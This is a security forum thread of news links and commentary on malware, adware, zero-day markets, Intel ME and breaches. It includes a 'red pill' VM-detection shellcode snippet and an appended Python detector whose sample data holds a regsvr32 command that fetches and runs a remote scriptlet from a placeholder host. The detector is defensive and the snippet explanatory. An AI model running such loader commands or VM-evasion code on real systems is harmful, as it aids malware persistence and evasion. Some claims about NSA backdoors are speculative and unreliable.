SECURITY WARNINGS & Notices - Please post them here

New Malware Abuses PowerPoint Slide Show
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-0199-new-malware-abuses-powerpoint-slide-show/

The Crisis of Connected Cars: When Vulnerabilities Affect the CAN Standard
http://blog.trendmicro.com/trendlabs-security-intelligence/connected-car-hack/

Hundreds of adware-infested Android apps in Google Play;
one hundred or so of these adware-laden apps still have not been taken down by Google.

More and more, the Google Chrome Android mono-culture is becoming a privacy and adware nightmare for end users,
and the Google Chrome browser mono-culture is likewise becoming a threat.

Fewer and fewer alternative paths are open for those who want to evade these intrusions. :cry: :-[
Even Firefox has thrown in the towel to further the Google extension API everywhere.
More attack surface means less defense and bigger threats to the sheeple!!!

Re: http://blog.trendmicro.com/trendlabs-security-intelligence/ghostclicker-adware-is-a-phantomlike-android-click-fraud/

polonus

It’s baaaack: Locky ransomware is on the rise again
https://nakedsecurity.sophos.com/2017/08/17/its-baaaack-locky-ransomware-is-on-the-rise-again/

New Disdain Exploit Kit Detected in the Wild
http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/

Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-004
https://www.drupal.org/SA-CORE-2017-004

500 ad-ridden apps removed by Google from the web store:
http://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware

Read about the development: https://blog.lookout.com/igexin-malicious-sdk
Mainland China testbed for ad- and spyware for developers and surveillance alike.

Do not read here, as it comes ad-ridden by itself, block link: htxp://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware
Link found in: https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-social/hosts (uBlock O).

polonus

List of programs to stay away from or be especially cautious with,
because the firm pays to compromise them through zero-days:

hxtps://zerodium.com/program.html
(link broken by me, as it could be risky for the non-savvy).

The firm is buying zero-days in chat apps like Signal, WhatsApp, WeChat, Telegram, Facebook Messenger and Viber.

Amazing that there are states in the world where such a security-endangering trade in zero-days can be performed within legal bounds. :o

polonus

New EMPTY CryptoMix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/

Can it not be made really and one-way secure? HTTP public key pinning: they are giving up on HPKP.
Read on the background:
https://www.theregister.co.uk/2017/08/25/hpkp_crypto_criticism/ (link author = John Leyden)

Because of the complexity and feared attacks like: https://scotthelme.co.uk/using-security-features-to-do-bad-things/
Trust chains must be unbroken, no certs should ever be issued in error, some to trust: https://certificatechain.io/
and do not forget to check that the code is correct. The cert should be in your DNSSEC-authenticated DNS records.

It could come to the point that we also drop most of the root CAs from browsers,
or at least devalue them to orange padlocks or something, until explicitly trusted. DANE will come coded into the browser
(Chrome and Firefox). Time to change to DNSSEC, but a lot of banks haven’t yet changed… (info source: comments on the article)

pol

L.S.

Trying to get ring 0 on chips sort of tinker-proof by disabling the Intel Management Engine via a new method.

Probably the availability of this bit can only mean the NSA requires a possibility to de-install this attack vector, to just use it for themselves. Also consider, for instance, the new byte-by-byte load- and tinker-proof Google Titan chip.

Intel and AMD are getting at your data big time, and the NSA as well, as we know by now from the backdoors.
In this case it is the NSA’s High Assurance Platform, an NSA trusted platform
(the bit found by researchers in the code was named “reserve_hap”).
One thinks it was designed to prevent so-called “side-leaks”.

OpenSSL has now been proven to be crappy, and it took Heartbleed to make us aware of the really insecure, overall ‘borked’ situation.

So as the going is getting increasingly narrow through the use of undocumented, unsupported features,
there is a need for open software alternatives, to see that resource engineering
is not exclusively meant for big government and big business.

Intel AMT handling now looks weird, just AMT being abused to create a worm of sorts,
and WannaCry in comparison would have been a picnic.

Open-source CPU: the Chinese will facilitate it (but not in the Lenovo way, please). Like this: https://www.forbes.com/sites/rogerkay/2015/03/20/openpower-unlocks-floodgates-for-an-all-chinese-server-business/
The POWER9 CPU does not cost that much, but the mainboard is very, very expensive (because of the low minimum production volumes) 8)

Another name to mention in this context: http://www.lowrisc.org

polonus (volunteer website security analyst and website error-hunter)

I am subscribed to Have I been pwned? and have been notified of a huge email and possible password breach, including my Outlook account.

Breach info: https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/

Have I been pwned? info: https://haveibeenpwned.com/

Update to Security Bulletin (APSB17-24)
https://blogs.adobe.com/psirt/?p=1484

Hi simion,

Would you check freely at https://haveibeenpwned.com/ ?
I remember the WOT web reputation user database sell-out tragedy.
What does the word TRUST still mean on the Interwebs today?
Should we not start to use UIN aliases?

polonus

“Roboto Condensed Font” social engineering attack targets Firefox and Chrome users:

https://malwarebreakdown.com/2017/08/30/roboto-condensed-social-engineering-attack-targets-both-chrome-and-firefox-users-various-payloads-being-delivered/

Can be related to coin-miner crypto-currency delving malware, or to installing Nymaim and Ursnif malware.

So do not fall for the malcode scam… :wink:

polonus

Greetings pol:

Yes, certainly trust is a dwindling commodity on today’s internet. But you must trust someone, or why be on the net at all? To me, it is worth the risk of being registered at a site like Have I been pwned? and having my email possibly sold or stolen in a site database attack. My reward is being notified of account breaches which may include my email, password, real name, address and telephone number, Social Security or other personal government identification numbers. The trade-off is clearly worth it.

I’m not familiar with UIN Aliases, but I fear it might be another database to be lost, stolen, or compromised.

Regards,
Simion

Thank you, Simion, for your reaction.

I checked and fortunately all of my present mail accounts were/are secure.
Once we were affected by a hack here on the forums, and all were advised to change their account passwords.

A good old trick I learned from an old-timer admin was to enter a wrong password first and come up with the appropriate one later.
There might be a phase, however, where we cannot go on any longer without two-phase authorization.

Certainly education and following best server & client configuration and best practices would help,
but while you visit this site here, you are very well aware of the fact that the security status of the general infrastructure on the Interwebs is far below par.

Those who know how to fend for themselves are slowly becoming a small minority,
and that overall situation does not seem to worry the majority of common users, nor those parties whom the situation at hand suits well. >:(

A sorry situation really, but we here cannot make the difference, as anyone can :frowning:

Stay safe and secure both online and offline, is the wish of

polonus aka Damian (volunteer website security analyst and website error-hunter)

P.S. on UIN aliases: https://www.ltnow.com/using-aliases-in-gmail/

“Fileless” backdoor spreading through USB sticks:
http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/
and
http://blog.trendmicro.com/trendlabs-security-intelligence/usb-malware-implicated-fileless-attacks/

Payload does not go to disk but enters directly into memory.

Only a few anti-malware tools can protect against such an attack taking effect.
While all say they are performing memory scans,
this only means they detect “KNOWN” malicious code in memory and not in a generic way.

Backdoors can now spread via shortcuts on USB sticks.

This procedure is called “fileless” because an entry is added to the registry that calls regsvr32,
while a URL is added into Windows’ scripting engine,
upon which that URL downloads a script and executes it.

So the computer does not have any “infested” file. However, every time at boot that same malware is loaded.
As said, not all AV is up to protecting against this form of malware (yet).

This also has certain implications for Joanna Rutkowska’s idea of the stateless laptop: https://blog.invisiblethings.org/2015/12/23/state_harmful.html
She recently spoke about this at a Hamburg security conference. Re: https://github.com/rootkovska/state_harmful/blob/master/Makefile

Joanna Rutkowska's red pill code (32-bit x86 only: it writes a 32-bit pointer into the SIDT operand and runs bytes from the stack, so it needs a 32-bit build and an executable stack):

int swallow_redpill () {
    unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3"; /* SIDT [imm32] ; RET */
    *((unsigned*)&rpill[3]) = (unsigned)m;   /* patch the SIDT operand with the address of m */
    ((void(*)())&rpill)();                   /* run the stub: stores the 6-byte IDTR into m */
    return (m[5]>0xd0) ? 1 : 0;              /* top byte of the IDT base above 0xd0 suggests a VM */
}

meant for VM on Intel machines...

Backdoors like the JS_POWMET fileless malware were mainly detected in the Asia-Pacific theater.

polonus
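
The persistence trick described in the post above (a registry autorun entry that calls regsvr32 and hands a remote URL to the Windows scripting engine) leaves a trace in the registry even though nothing lands on disk, so it can be hunted for in exported autorun entries. The script below is an added example for this thread, not code from the post or from Trend Micro. It assumes the entries were exported as "key\name = command" lines, and it assumes the abuse takes the well-known shape "regsvr32 /s /n /u /i:<URL> scrobj.dll" (scrobj.dll being the script-hosting DLL); that shape is an assumption about details the post does not spell out. All sample entries, paths and URLs are constructed.

```python
import re

# Constructed sample of autorun values as an export tool might list them.
# The paths and the URL are made up for this example, not real indicators.
SAMPLE_RUN_ENTRIES = [
    r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll',
    r'HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = C:\Windows\system32\SecurityHealthSystray.exe',
    r'HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Legit = regsvr32 /s C:\Program Files\Vendor\vendor.dll',
]

# "hive\path\valuename = command": key is everything up to the last backslash.
ENTRY_RE = re.compile(r'^(?P<key>HK(?:LM|CU)\\[^=]+?)\\(?P<name>[^\\=]+?)\s*=\s*(?P<cmd>.+)$')
# The /i: switch of regsvr32 passes an argument to DllInstall; a URL there is the red flag.
URL_RE = re.compile(r'/i:\s*(?P<url>https?://\S+)', re.IGNORECASE)


def parse_entry(line):
    """Split one exported autorun line into key, value name and command, or None."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    return {"key": m.group("key"), "name": m.group("name"), "cmd": m.group("cmd")}


def classify(cmd):
    """Return the reasons an autorun command matches the fileless regsvr32 pattern (empty if none)."""
    reasons = []
    low = cmd.lower()
    if "regsvr32" not in low:
        return reasons
    url = URL_RE.search(cmd)
    if url:
        reasons.append("regsvr32 /i: points at a remote URL: " + url.group("url"))
    if "scrobj.dll" in low:
        reasons.append("loads scrobj.dll (Windows script host) instead of a vendor library")
    if re.search(r"(^|\s)/n(\s|$)", low) and re.search(r"(^|\s)/u(\s|$)", low):
        reasons.append("/n /u combination skips DllRegisterServer, typical of script-hosting abuse")
    return reasons


def find_suspicious(lines):
    """Return [(full registry path, [reasons]), ...] for entries that look like the fileless loader."""
    hits = []
    for line in lines:
        entry = parse_entry(line)
        if entry is None:
            continue
        reasons = classify(entry["cmd"])
        if reasons:
            hits.append((entry["key"] + "\\" + entry["name"], reasons))
    return hits


if __name__ == "__main__":
    for path, reasons in find_suspicious(SAMPLE_RUN_ENTRIES):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Note that the fourth sample entry also calls regsvr32 but points at a local vendor DLL without /i: or scrobj.dll, so it is deliberately not flagged; a detection that keys on regsvr32 alone would drown in false positives, which is why the check looks at how the tool is being used rather than at its name.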

Thanks, pol. Stay safe!

That Instagram hack is shaping up to be way bigger than anyone thought

http://mashable.com/2017/09/01/instagram-hack-regular-users/?utm_cid=hp-h-1#jEdk3_CXkPqz

http://www.thedailybeast.com/hackers-make-searchable-database-to-dox-instagram-celebs